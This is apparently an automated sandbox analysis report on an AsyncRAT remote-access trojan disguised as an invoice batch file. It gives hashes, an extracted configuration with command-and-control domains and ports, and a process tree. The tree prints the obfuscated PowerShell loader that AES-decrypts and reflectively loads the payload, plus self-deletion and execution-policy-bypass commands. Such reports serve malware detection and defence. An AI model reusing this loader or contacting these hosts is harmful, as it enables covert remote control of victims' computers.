Overview

overview

10

Static

static

1

Invoice 8177288.bat

windows7-x64

7

Invoice 8177288.bat

windows10-1703-x64

10

Invoice 8177288.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    55s
  • max time network
    139s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    03/03/2023, 14:42

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Invoice 8177288.bat

  • Size

    277KB

  • MD5

    a54966da0aad020b114e09b137dc89a8

  • SHA1

    6626c4c60f6dace61c52e08e564e75e567623c72

  • SHA256

    10b98dad801eb4a0b107453a2cbc7dbd6e215a246c641104713aaf5ee592b99d

  • SHA512

    78944b196ec333ee81a6bee8d2eced0af87878ee76263fa6d04cb48ef718fb87ad4e5ec180ffa92212d89bf8ac066c1fb429e9e0c14a0a40df990bb7b4b6bc32

  • SSDEEP

    6144:8UwThVr8zJDPryed/cYVvusvBSy1ZzWf2+5nfRi8Mk8U7J8s1ul8:yHrkLTlvzUZ55i8b8U7J8s1ul8

Score
10/10
asyncratdefaultrat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

lizasweetsky.ddns.net:6606

lizasweetsky.ddns.net:7707

lizasweetsky.ddns.net:8808

lizalizasky.ddns.net:6606

lizalizasky.ddns.net:7707

lizalizasky.ddns.net:8808

lizalizalizasky.ddns.net:6606

lizalizalizasky.ddns.net:7707

lizalizalizasky.ddns.net:8808
Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 2 IoCs
    rat
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:2860
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Invoice 8177288.bat"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4148
        • C:\Users\Admin\AppData\Local\Temp\Invoice 8177288.bat.exe
          "Invoice 8177288.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $SQCij = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Invoice 8177288.bat').Split([Environment]::NewLine);foreach ($OMtxx in $SQCij) { if ($OMtxx.StartsWith(':: ')) { $WVLpO = $OMtxx.Substring(3); break; }; };$vVbcG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($WVLpO);$nTIAJ = New-Object System.Security.Cryptography.AesManaged;$nTIAJ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nTIAJ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nTIAJ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dlzzMYP65LM7ll1SqYUN4sFQZ4y+xhYMFWCwLuqQxVU=');$nTIAJ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TUj6SwzE/tkLPDd65OogzA==');$nfjxC = $nTIAJ.CreateDecryptor();$vVbcG = $nfjxC.TransformFinalBlock($vVbcG, 0, $vVbcG.Length);$nfjxC.Dispose();$nTIAJ.Dispose();$iGEWb = New-Object System.IO.MemoryStream(, $vVbcG);$jVMrk = New-Object System.IO.MemoryStream;$LOiyd = New-Object System.IO.Compression.GZipStream($iGEWb, [IO.Compression.CompressionMode]::Decompress);$LOiyd.CopyTo($jVMrk);$LOiyd.Dispose();$iGEWb.Dispose();$jVMrk.Dispose();$vVbcG = $jVMrk.ToArray();$FVDSt = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($vVbcG);$wjFzR = $FVDSt.EntryPoint;$wjFzR.Invoke($null, (, [string[]] ('')))
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2272
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\Invoice 8177288.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\Invoice 8177288.bat.exe"
            4⤵
              PID:4228
              • C:\Windows\system32\choice.exe
                choice /c y /n /d y /t 1
                5⤵
                  PID:1272
                • C:\Windows\system32\attrib.exe
                  attrib -h -s "C:\Users\Admin\AppData\Local\Temp\Invoice 8177288.bat.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:3084
          • C:\Windows\System32\notepad.exe
            C:\Windows\System32\notepad.exe
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4544
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rsmbpe.bat"' & exit
              3⤵
                PID:4340
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\rsmbpe.bat"'
                  4⤵
                    PID:4844
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2F8C.tmp.bat""
                  3⤵
                    PID:4940
                    • C:\Windows\System32\timeout.exe
                      timeout 2
                      4⤵
                      • Delays execution with timeout.exe
                      PID:4852

              Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\Invoice 8177288.bat.exe
                      Filesize

                      435KB

                      MD5

                      f7722b62b4014e0c50adfa9d60cafa1c

                      SHA1

                      f31c17e0453f27be85730e316840f11522ddec3e

                      SHA256

                      ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

                      SHA512

                      7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\Invoice 8177288.bat.exe
                      Filesize

                      435KB

                      MD5

                      f7722b62b4014e0c50adfa9d60cafa1c

                      SHA1

                      f31c17e0453f27be85730e316840f11522ddec3e

                      SHA256

                      ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

                      SHA512

                      7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ol3uotrj.rny.ps1
                      Filesize

                      1B

                      MD5

                      c4ca4238a0b923820dcc509a6f75849b

                      SHA1

                      356a192b7913b04c54574d18c28d46e6395428ab

                      SHA256

                      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                      SHA512

                      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\tmp2F8C.tmp.bat
                      Filesize

                      145B

                      MD5

                      c794bc0b621d9e65d764fd9c2c4ebc9f

                      SHA1

                      86d555be263e4e4af3358cd1c9e1d9d2bae08d77

                      SHA256

                      8884f1370c6c5ed193cb5e75f04d5cd81b93613ac510d4f7c128a80ebdd0a178

                      SHA512

                      27fc38592f534b93a6c3454658e01e5bfc8a45f0e59e3f14e0efd05eab507c8332194e09fa6915f60a9e7fcd472bad4b2a33f9b8f7b0ad7c9e9a6e0e9d4cf0e3

                      Download Submit

                    • memory/2272-167-0x0000024AAFB70000-0x0000024AAFBC9000-memory.dmp

                      Filesize

                      356KB

                      Download

                    • memory/2272-145-0x0000024AAF960000-0x0000024AAF970000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/2272-146-0x0000024AAFA90000-0x0000024AAFAC8000-memory.dmp

                      Filesize

                      224KB

                      Download

                    • memory/2272-144-0x0000024AAF960000-0x0000024AAF970000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/2272-148-0x0000024AAFAD0000-0x0000024AAFADC000-memory.dmp

                      Filesize

                      48KB

                      Download

                    • memory/2272-149-0x0000024AAFB70000-0x0000024AAFBC9000-memory.dmp

                      Filesize

                      356KB

                      Download

                    • memory/2272-159-0x0000024AAFAE0000-0x0000024AAFAE1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2272-124-0x0000024AAF910000-0x0000024AAF932000-memory.dmp

                      Filesize

                      136KB

                      Download

                    • memory/2272-163-0x0000024AAFAE0000-0x0000024AAFAE1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2272-166-0x0000024AAFB70000-0x0000024AAFBC9000-memory.dmp

                      Filesize

                      356KB

                      Download

                    • memory/2272-129-0x0000024AAFAF0000-0x0000024AAFB66000-memory.dmp

                      Filesize

                      472KB

                      Download

                    • memory/4544-182-0x0000025AE74D0000-0x0000025AE74E0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4544-199-0x0000025A80130000-0x0000025A801AE000-memory.dmp

                      Filesize

                      504KB

                      Download

                    • memory/4544-176-0x0000025AE5B60000-0x0000025AE5B72000-memory.dmp

                      Filesize

                      72KB

                      Download

                    • memory/4544-183-0x0000025AE74D0000-0x0000025AE74E0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4544-189-0x0000025AE74D0000-0x0000025AE74E0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4544-190-0x0000025AE74D0000-0x0000025AE74E0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4544-191-0x0000025AE74D0000-0x0000025AE74E0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4544-181-0x0000025AE74D0000-0x0000025AE74E0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4544-201-0x0000025A80250000-0x0000025A8026E000-memory.dmp

                      Filesize

                      120KB

                      Download

                    • memory/4544-208-0x0000025A80230000-0x0000025A8023A000-memory.dmp

                      Filesize

                      40KB

                      Download

                    • memory/4544-215-0x0000025A803E0000-0x0000025A80440000-memory.dmp

                      Filesize

                      384KB

                      Download

                    • memory/4544-222-0x0000025A80440000-0x0000025A804D0000-memory.dmp

                      Filesize

                      576KB

                      Download

                    • memory/4544-225-0x0000025A804F0000-0x0000025A80512000-memory.dmp

                      Filesize

                      136KB

                      Download

                    • memory/4544-230-0x0000025AE74D0000-0x0000025AE74E0000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4544-161-0x0000025AE5840000-0x0000025AE5855000-memory.dmp

                      Filesize

                      84KB

                      Download